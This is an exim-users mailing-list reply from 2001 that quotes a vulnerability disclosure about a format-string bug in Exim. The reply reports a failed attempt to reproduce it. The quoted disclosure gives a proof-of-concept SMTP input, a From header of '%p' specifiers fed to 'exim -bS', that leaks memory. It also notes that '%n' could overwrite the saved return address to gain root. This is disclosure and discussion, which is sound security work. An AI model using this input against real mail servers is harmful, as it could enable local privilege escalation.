I'm unable to get my 3.22 systems on Solaris 2.6 x86 and 8 on Sparc to
exhibit this behavior, with the options Megyer stated were necessary. I
wonder if it's OS specific.
Megyer,
Perhaps you could provide a bit more detail. Which version of Exim? Which
OS and version? Also you could have approached the author (Philip Hazel)
or the exim-users list in general before going public.
Thanks,
Tabor
On Wed, Jun 06, 2001 at 04:12:16PM +0200,
Tamas TEVESZ <ice@???> is thought to have said:
> Exploitation:
> -------------
>
> Try this:
> ===8<======8<=======8<======
> lez:~$ /usr/sbin/exim -bS
> mail from:lez@lez
> rcpt to:hax0r@lez
> data
> From:@@%p%p%p%p%p%p%p%p%p%p
>
> .
> ===8<======8<=======8<=======
>
> Somewhere in the answers you should see:
> 550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
>
> If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get root out of this bug.
>
> No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man.
> --
> Megyer Laszlo (Lez)
> lez@???
> __________________________________________________
> Security-l maillist - Security-l@???
> http://sunserv.kfki.hu/mailman/listinfo/security-l
>
>
>
>
>
> --
> ## List details at http://www.exim.org/mailman/listinfo/exim-users Exim details at http://www.exim.org/ ##
--
--------------------------------------------------------------------
Tabor J. Wells twells@???
Fsck It! Just another victim of the ambient morality